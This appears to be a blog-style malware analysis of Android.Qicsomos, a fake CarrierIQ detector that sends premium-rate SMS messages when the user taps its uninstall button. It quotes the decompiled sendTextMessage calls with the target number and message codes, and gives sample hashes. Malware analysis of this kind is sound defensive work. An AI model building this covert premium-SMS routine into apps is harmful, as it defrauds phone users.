Intro: What is Android.Qicsomos?
Android.Qicsomos is a new Android malware that emerged some days ago. It sends SMS messages to premium rated numbers.
Analysis of the Application and Its Structure
The app requests the following permissions:
- android.permission.READ_LOGS
- android.permission.SEND_SMS
After the application has been installed successfully, the icon of the app shows up in the dashboard. The name of the application and the UI look like an app for detecting CarrierIQ.
The Malicious Parts:
The malicious part of the app starts, when an user hits the “Déinstaller” button. The app sends four SMS messages to “81168” containing the text “AT37”, “MC49”, “SP99” and “SP93” before it gets deinstalled. (for more information see the following code-snippet)
localSmsManager.sendTextMessage("81168", null, "AT37", null, null);
try{
label15: localSmsManager.sendTextMessage("81168", null, "MC49", null, null);
try{
label26: localSmsManager.sendTextMessage("81168", null, "SP99", null, null);
try{
label37: localSmsManager.sendTextMessage("81168", null, "SP93", null, null);
label48: Intent localIntent = new Intent("android.intent.action.DELETE", Uri.parse("package:org.projectvoodoo.simplecarrieriqdetector"));
...
Sample Information:
sha256:
79a3bc6da45243355a920082dc67da0febf19379c25c721c43fd6b3f83ff4ef4
md5:
69b9691a8274a17cdc22e9681b3e1c74
2 Replies to “Detailed Analysis of Android.Qicsomos”